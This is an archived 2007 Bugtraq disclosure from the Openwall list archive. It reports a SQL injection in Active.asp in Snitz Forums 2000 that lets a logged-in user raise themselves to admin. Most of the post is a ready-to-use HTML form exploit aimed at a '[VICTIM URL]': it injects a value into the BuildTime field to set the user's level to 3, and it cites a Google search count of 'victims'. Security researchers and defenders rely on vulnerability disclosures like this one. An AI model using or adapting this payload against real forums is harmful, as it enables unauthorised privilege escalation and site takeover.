lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 3 Dec 2007 22:21:06 -0000
From: admin@...report.ir
To: bugtraq@...urityfocus.com
Subject: Snitz2000 SQL Injection: A user can gain admin level

########################## WwW.BugReport.ir #########################
#
#      AmnPardaz Security Research & Penetration Testing Group
#
# Title: A user can gain admin level in snitz 2000 by SQL Injection
# vendor: http://forum.snitz.com/
# Googling: "Powered by Snitz" > 2,440,000 victims
# Last bug report in 2007-02-16 with 4692 visitors
# Exploit: Available
# Fix Available: Update to last version.
######################## Bug Description ###########################
A user can gain admin level in the forum and can access to the forum.
It is because of a SQL Injection in "Active.asp"

After login to your VICTIM forum, execute below script
~~~~~~~~~~~~Start HTML Exploit~~~~~~~~~
<form action="http://[VICTIM URL]/active.asp" method="post">
Query: <input type="text" name="BuildTime" value="',M_Level='3" /><br />
DefaultValues: <input type="text" name="AllRead" value="Y" /><br />
Submit: <input type="submit" name="submit" value="Submit" /><br />
</form>
~~~~~~~~~~~~End HTML Exploit~~~~~~~~~

#####################################################################
# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com
# Country: Iran
# Contact: admin@...report.ir
# Credit: Soroush Dalili found this bug.
#####################################################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ